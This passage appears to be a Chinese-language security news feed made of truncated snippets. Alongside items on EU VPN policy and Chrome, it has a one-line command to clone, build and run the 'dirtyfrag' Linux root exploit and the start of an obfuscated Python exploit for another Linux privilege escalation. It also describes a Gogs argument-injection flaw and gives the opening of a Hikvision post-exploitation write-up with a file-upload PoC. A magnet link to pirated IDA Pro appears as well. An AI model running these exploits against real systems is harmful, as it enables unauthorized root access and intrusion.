📰 最近消息
不是吧,又来一个 Linux universal LPEhttps://www.openwall.com/lists/oss-security/2026/05/07/8https://github.com/V4bel/dirtyfraggit clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./expMitigation:sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/fal
对了忘记转发 IDA Pro 9.3 SP2 了magnet:?xt=urn:btih:57bd6e22aa74309330f6613c0cf9302edd1c586e&dn=ida93sp2
相信你们也都看到了这个https://cyberinsider.com/eu-calls-vpns-a-loophole-that-needs-closing-in-age-verification-push/代替家长就会是这么个无底洞,先要求声明年龄,发现人是可以撒谎的就开始要求上传身份证,然后还是拦不住因为有 VPN,再 ban 掉 VPN 最后你发现自己和国内没什么区别了
如果数据真的留在设备上,为什么需要改措辞?对 ToS 和隐私政策(其次是产品说明)的改动是最能体现公司的价值观和实际目标的https://cybernews.com/ai-news/chrome-removes-ai-privacy-wording-google-says-data-still-stays-on-device/前情提要:Chrome 会静默在后台下载 4GB 的AI 模型https://tech.yahoo.com/ai/gemini/article/google-chrome-sneakily-installed-a-4gb-ai-file-on-your-computer-
搓了一个 dbus idle monitor,让你的 i3 和其它 wm 也可以用 1Password 的自动锁定https://github.com/k4yt3x/idlemon
这新的 Linux LPE 太强了2017 到现在的所有版本的所有 distro,一键 root快去 patchhttps://copy.failhttps://xint.io/blog/copy-fail-linux-distributions#!/usr/bin/env python3import os as g,zlib,socket as sdef d(x):return bytes.fromhex(x)def c(f,t,c): a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;
我真服了 Intel 了,看起来第二颗 14900K 又不行了,再 RMA 一颗吧,可能换个 14900/T 之类没那么容易 degrade 的型号单独放一台开发机什么的,工作站得换 9950X3D 了,真受不了
Metasploit框架添加Gogs重基远程代码执行漏洞利用模块添加了一个针对Gogs拉取请求合并流程中参数注入漏洞的利用模块(版本< = 0.14.2和0.15.0+dev)。internal/database/pull.go中的Merge()函数在传递PR基分支名称时,没有使用--分隔符。Git会将名为--exec=的分支解析为--exec标志而非位置参数,导致在重基过程中,每个回放的提交后都会运行sh -c 。通过Gogs参数注入实现认证远程代码执行Rapid7实验室在Gogs(一款流行的开源自托管Git服务)中发现了一个严重的参数注入(CWE-88)漏洞。Rapid7实验室将此漏洞评级
记一次海康综合安防后渗透(三部曲)0x01 入口点app="HIKVISION-综合安防管理平台"title="综合安防管理平台"首先要先找到入口点,有两种方法,一种是通过利用report任意文件上传,另一种是收集信息获取到redis数据的密码,然后使用主从复制来getshell,实现内网突破report任意文件上传poc如下POST /svm/api/external/report HTTP/1.1Host: xx.xx.xx.xx:11443User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML,
记一次海康综合安防后渗透0x02 后渗透讲完入口点后,就可以收集里面的信息了来到/opt/hikvision/web/components路径下,这里是设备中的应用安装路径,每个应用中的配置文件路径:conf/config.properties,查看文件就可以获取一系列应用服务的配置,取得服务权限来得分。(配置文件解密工具 GitHub - wafinfo/Hikvision: 海康威视综合安防平台后渗透利用工具)应用权限主要配置文件所在应用文件夹如下(示例):PgSql(7092/管理员):postgresql11linux64.1Redis:redislinux64.1MinIO:mini